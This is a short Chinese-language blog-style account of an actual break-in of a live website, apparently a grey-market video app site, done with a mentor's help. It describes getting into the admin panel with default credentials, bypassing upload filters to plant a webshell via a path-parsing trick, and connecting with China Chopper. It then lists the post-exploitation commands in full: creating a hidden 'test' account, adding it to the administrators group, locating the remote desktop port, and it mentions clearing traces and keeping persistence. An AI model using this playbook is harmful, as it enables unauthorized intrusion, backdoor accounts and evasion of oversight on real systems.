只有一个目标域名 domaincom
前期信息收集:
- 该站点是一个视频app的推广网站
- 子域名爆破一波:发现一个比较有意思的的视频主站,没有分析app的数据包,但是估计就是调用的这个主站的资源。
- 后台尝试一下:admin直接跳转到了后台,卧槽太顺利了
- 有验证码,瞬间想放弃,师父在旁边说,有验证码就放弃了啊
- 尝试admin:admin登录成功(!!!!!!
后台进去了找上传点:
后台总览:
上传点尝试了 filename.php.jpg file.php/filename.jpg burp改包
最后上传的filename.php 访问domain.com/filename.php/222.php 成功解析
上菜刀!!!!!
拿到webshell之后:
菜刀连接进入命令行
第一步:查找当前用户具有增删改查的目录
c:/WINDOWS/TEMP
第二步:查看系统补丁信息
systeminfo
第三步:上传exp---提权---创建用户---查找远程桌面---登录----清除痕迹----维持权限
查看当前的用户:
query user
新建用户
net user test Asd#@321 /add
查询当前管理员用户组成员
net localgroup administrators
将用户添加到管理员组
net localgroup administrators test /add
查询当前用户信息
whoami
查询远程桌面端口
tasklist -svc
netstat -ano
访问远程桌面,end
总结:注入点的解析思路,根据补丁查找对应的exp,查找对应的远程桌面端口。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
最近在搞基于docker的elk+蜜罐分布式部署,没有搞通,烦得很。师父带着日了个灰产站,也算学习了一下整个流程。